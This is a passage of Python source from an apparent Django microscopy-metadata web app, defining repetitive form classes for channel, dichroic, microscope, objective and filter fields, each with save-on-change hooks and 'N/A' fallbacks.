logicalCh.id, "contrastMethod", options=True
)
}
),
label="Contrast method",
required=False,
)
set_widget_attrs(self.fields["contrastMethod"])
except Exception:
self.fields["contrastMethod"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Contrast method",
required=False,
)
set_widget_attrs(self.fields["contrastMethod"])
# Mode
try:
if logicalCh.getMode() is not None:
self.fields["mode"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["modes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
logicalCh.id, "mode", options=True
)
}
),
initial=logicalCh.getMode().value,
required=False,
)
else:
self.fields["mode"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["modes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
logicalCh.id, "mode", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["mode"])
except Exception:
self.fields["mode"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["mode"])
# pockelCellSetting
try:
if logicalCh.pockelCellSetting is not None:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=logicalCh.pockelCellSetting,
label="Pockel cell",
required=False,
)
else:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
label="Pockel cell",
required=False,
)
set_widget_attrs(self.fields["pockelCellSetting"])
except Exception:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pockel cell",
required=False,
)
set_widget_attrs(self.fields["pockelCellSetting"])
self.fields.keyOrder = [
"name",
"excitationWave",
"emissionWave",
"ndFilter",
"pinHoleSize",
"fluor",
"illumination",
"contrastMethod",
"mode",
"pockelCellSetting",
]
class MetadataDichroicForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataDichroicForm, self).__init__(*args, **kwargs)
# Manufacturer
try:
if kwargs["initial"]["dichroic"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].id, "manufacturer"
),
}
),
initial=kwargs["initial"]["dichroic"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].id, "manufacturer"
),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Model
try:
if kwargs["initial"]["dichroic"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].id, "model"
),
}
),
initial=kwargs["initial"]["dichroic"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].id, "model"
),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# Serial number
try:
if kwargs["initial"]["dichroic"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].serialNumber,
"serialNumber",
),
}
),
initial=kwargs["initial"]["dichroic"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].serialNumber,
"serialNumber",
),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot number
try:
if kwargs["initial"]["dichroic"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].lotNumber, "lotNumber"
),
}
),
initial=kwargs["initial"]["dichroic"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["dichroic"].lotNumber, "lotNumber"
),
}
),
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
self.fields.keyOrder = ["model", "manufacturer", "serialNumber", "lotNumber"]
class MetadataMicroscopeForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataMicroscopeForm, self).__init__(*args, **kwargs)
# Model
try:
if kwargs["initial"]["microscope"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "model"
),
}
),
initial=kwargs["initial"]["microscope"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "model"
),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# Manufacturer
try:
if kwargs["initial"]["microscope"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "manufacturer"
),
}
),
initial=kwargs["initial"]["microscope"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "manufacturer"
),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Serial number
try:
if kwargs["initial"]["microscope"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "lotNumber"
),
}
),
initial=kwargs["initial"]["microscope"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "lotNumber"
),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot number
try:
if kwargs["initial"]["microscope"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "lotNumber"
),
}
),
initial=kwargs["initial"]["microscope"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "lotNumber"
),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
# Type
try:
if kwargs["initial"]["microscope"].getMicroscopeType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["microscopeTypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "type", options=True
)
}
),
initial=kwargs["initial"]["microscope"].getMicroscopeType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["microscopeTypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["microscope"].id, "type", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["type"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
]
class MetadataObjectiveForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataObjectiveForm, self).__init__(*args, **kwargs)
# Model
try:
if kwargs["initial"]["objective"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "model"
),
}
),
initial=kwargs["initial"]["objective"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "model"
),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# Manufacturer
try:
if kwargs["initial"]["objective"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "manufacturer"
),
}
),
initial=kwargs["initial"]["objective"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "manufacturer"
),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Serial Number
try:
if kwargs["initial"]["objective"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "serialNumber"
),
}
),
initial=kwargs["initial"]["objective"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "serialNumber"
),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot number
try:
if kwargs["initial"]["objective"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].lotNumber, "lotNumber"
),
}
),
initial=kwargs["initial"]["objective"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["logicalchannel"]
.getObjective()
.lotNumber,
"lotNumber",
),
}
),
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
# Nominal Magnification
try:
if kwargs["initial"]["objective"].nominalMagnification is not None:
self.fields["nominalMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"nominalMagnification",
),
}
),
initial=kwargs["initial"]["objective"].nominalMagnification,
label="Nominal magnification",
required=False,
)
else:
self.fields["nominalMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"nominalMagnification",
),
}
),
label="Nominal magnification",
required=False,
)
set_widget_attrs(self.fields["nominalMagnification"])
except Exception:
self.fields["nominalMagnification"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Nominal magnification",
required=False,
)
set_widget_attrs(self.fields["nominalMagnification"])
# Calibrated Magnification
try:
if kwargs["initial"]["objective"].calibratedMagnification is not None:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"calibratedMagnification",
),
}
),
initial=kwargs["initial"]["objective"].calibratedMagnification,
label="Calibrated magnification",
required=False,
)
else:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"calibratedMagnification",
),
}
),
label="Calibrated magnification",
required=False,
)
set_widget_attrs(self.fields["calibratedMagnification"])
except Exception:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Calibrated magnification",
required=False,
)
set_widget_attrs(self.fields["calibratedMagnification"])
# Lens NA
try:
if kwargs["initial"]["objective"].lensNA is not None:
self.fields["lensNA"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "lensNA"
),
}
),
initial=kwargs["initial"]["objective"].lensNA,
label="Lens NA",
required=False,
)
else:
self.fields["lensNA"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "lensNA"
),
}
),
required=False,
)
set_widget_attrs(self.fields["lensNA"])
except Exception:
self.fields["lensNA"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lens NA",
required=False,
)
set_widget_attrs(self.fields["lensNA"])
# Immersion
try:
if kwargs["initial"]["objective"].getImmersion() is not None:
self.fields["immersion"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["immersions"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"immersion",
options=True,
)
}
),
initial=kwargs["initial"]["objective"].getImmersion().value,
required=False,
)
else:
self.fields["immersion"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["immersions"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"immersion",
options=True,
)
}
),
required=False,
)
set_widget_attrs(self.fields["immersion"])
except Exception:
self.fields["immersion"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["immersion"])
# Correction
try:
if kwargs["initial"]["objective"].getCorrection() is not None:
self.fields["correction"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["corrections"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"correction",
options=True,
)
}
),
initial=kwargs["initial"]["objective"].getCorrection().value,
required=False,
)
else:
self.fields["correction"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["corrections"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"correction",
options=True,
)
}
),
required=False,
)
set_widget_attrs(self.fields["correction"])
except Exception:
self.fields["correction"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["correction"])
# Working Distance
try:
if kwargs["initial"]["objective"].workingDistance is not None:
self.fields["workingDistance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "workingDistance"
),
}
),
initial=kwargs["initial"]["objective"].workingDistance.getValue(),
label=(
"Working distance (%s)"
% kwargs["initial"]["objective"].workingDistance.getSymbol()
),
required=False,
)
else:
self.fields["workingDistance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "workingDistance"
),
}
),
label="Working distance",
required=False,
)
set_widget_attrs(self.fields["workingDistance"])
except Exception:
self.fields["workingDistance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Working distance",
required=False,
)
set_widget_attrs(self.fields["workingDistance"])
# Iris
try:
if kwargs["initial"]["objective"].getIris() is not None:
self.fields["iris"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "iris", options=True
)
}
),
initial=kwargs["initial"]["objective"].getIris().value,
required=False,
)
else:
self.fields["iris"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "iris", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["iris"])
except Exception:
self.fields["iris"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["iris"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"nominalMagnification",
"calibratedMagnification",
"lensNA",
"immersion",
"correction",
"workingDistance",
"iris",
]
class MetadataObjectiveSettingsForm(MetadataObjectiveForm):
BOOLEAN_CHOICES = (
("", "---------"),
("True", "True"),
("False", "False"),
)
def __init__(self, *args, **kwargs):
super(MetadataObjectiveSettingsForm, self).__init__(*args, **kwargs)
# Objective Settings
# Correction Collar
try:
if kwargs["initial"]["objectiveSettings"].correctionCollar is not None:
self.fields["correctionCollar"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"correctionCollar",
),
}
),
initial=kwargs["initial"]["objectiveSettings"].correctionCollar,
label="Correction collar",
required=False,
)
else:
self.fields["correctionCollar"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"correctionCollar",
),
}
),
label="Correction collar",
required=False,
)
set_widget_attrs(self.fields["correctionCollar"])
except Exception:
self.fields["correctionCollar"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Correction collar",
required=False,
)
set_widget_attrs(self.fields["correctionCollar"])
# Medium
try:
if kwargs["initial"]["objectiveSettings"].getMedium() is not None:
self.fields["medium"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"medium",
options=True,
)
}
),
initial=kwargs["initial"]["objectiveSettings"].getMedium().value,
required=False,
)
else:
self.fields["medium"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"medium",
options=True,
)
}
),
required=False,
)
set_widget_attrs(self.fields["medium"])
except Exception:
self.fields["medium"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["medium"])
# Refractive Index
try:
if kwargs["initial"]["objectiveSettings"].refractiveIndex is not None:
self.fields["refractiveIndex"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"refractiveIndex",
),
}
),
initial=kwargs["initial"]["objectiveSettings"].refractiveIndex,
label="Refractive index",
required=False,
)
else:
self.fields["refractiveIndex"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"refractiveIndex",
),
}
),
label="Refractive index",
required=False,
)
set_widget_attrs(self.fields["refractiveIndex"])
except Exception:
self.fields["refractiveIndex"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Refractive index",
required=False,
)
set_widget_attrs(self.fields["refractiveIndex"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"nominalMagnification",
"calibratedMagnification",
"lensNA",
"immersion",
"correction",
"workingDistance",
"iris",
"correctionCollar",
"medium",
"refractiveIndex",
]
class MetadataFilterForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataFilterForm, self).__init__(*args, **kwargs)
# Filter
# Manufacturer
try:
if kwargs["initial"]["filter"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "manufacturer"
),
}
),
initial=kwargs["initial"]["filter"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "manufacturer"
),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Model
try:
if kwargs["initial"]["filter"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "model"
),
}
),
initial=kwargs["initial"]["filter"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "model"
),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# Serial Number
try:
if kwargs["initial"]["filter"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "serialNumber"
),
}
),
initial=kwargs["initial"]["filter"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "serialNumber"
),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot number
try:
if kwargs["initial"]["filter"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "lotNumber"
),
}
),
initial=kwargs["initial"]["filter"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "lotNumber"
),
}
),
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
# Filter wheel
try:
if kwargs["initial"]["filter"].filterWheel is not None:
self.fields["filterWheel"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "filterWheel"
),
}
),
initial=kwargs["initial"]["filter"].filterWheel,
label="Filter wheel",
required=False,
)
else:
self.fields["filterWheel"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "filterWheel"
),
}
),
label="Filter wheel",
required=False,
)
set_widget_attrs(self.fields["filterWheel"])
except Exception:
self.fields["filterWheel"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Filter wheel",
required=False,
)
set_widget_attrs(self.fields["filterWheel"])
# Type
try:
if kwargs["initial"]["filter"].getFilterType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "type", options=True
)
}
),
initial=kwargs["initial"]["filter"].getFilterType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "type", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["type"])
# Cut in
tr = kwargs["initial"]["filter"].getTransmittanceRange()
try:
if tr is not None and tr.cutIn is not None:
self.fields["cutIn"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutIn"
),
}
),
initial=kwargs["initial"]["filter"]
.getTransmittanceRange()
.cutIn.getValue(),
label="Cut in (%s)" % tr.cutIn.getSymbol(),
required=False,
)
else:
self.fields["cutIn"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutIn"
),
}
),
label="Cut in",
required=False,
)
set_widget_attrs(self.fields["cutIn"])
except Exception:
self.fields["cutIn"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut in",
required=False,
)
set_widget_attrs(self.fields["cutIn"])
# Cut out
try:
if tr is not None and tr.cutOut is not None:
self.fields["cutOut"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutOut"
),
}
),
initial=tr.cutOut.getValue(),
label="Cut out (%s)" % tr.cutOut.getSymbol(),
required=False,
)
else:
self.fields["cutOut"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutOut"
),
}
),
label="Cut out",
required=False,
)
set_widget_attrs(self.fields["cutOut"])
except Exception:
self.fields["cutOut"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut out",
required=False,
)
set_widget_attrs(self.fields["cutOut"])
# Cut in tolerance
try:
if tr is not None and tr.cutInTolerance is not None:
self.fields["cutInTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutInTolerance"
),
}
),
initial=tr.cutInTolerance.getValue(),
label=("Cut in tolerance (%s)" % tr.cutInTolerance.getSymbol()),
required=False,
)
else:
self.fields["cutInTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutInTolerance"
),
}
),
label="Cut in tolerance",
required=False,
)
set_widget_attrs(self.fields["cutInTolerance"])
except Exception:
self.fields["cutInTolerance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut in tolerance",
required=False,
)
set_widget_attrs(self.fields["cutInTolerance"])
# Cut on tolerance
try:
if tr is not None and tr.cutOutTolerance is not None:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutOut"
),
}
),
initial=tr.cutOutTolerance.getValue(),
label=("Cut out tolerance (%s)" % tr.cutOutTolerance.getSymbol()),
required=False,
)
else:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutOut"
),
}
),
label="Cut out tolerance",
required=False,
)
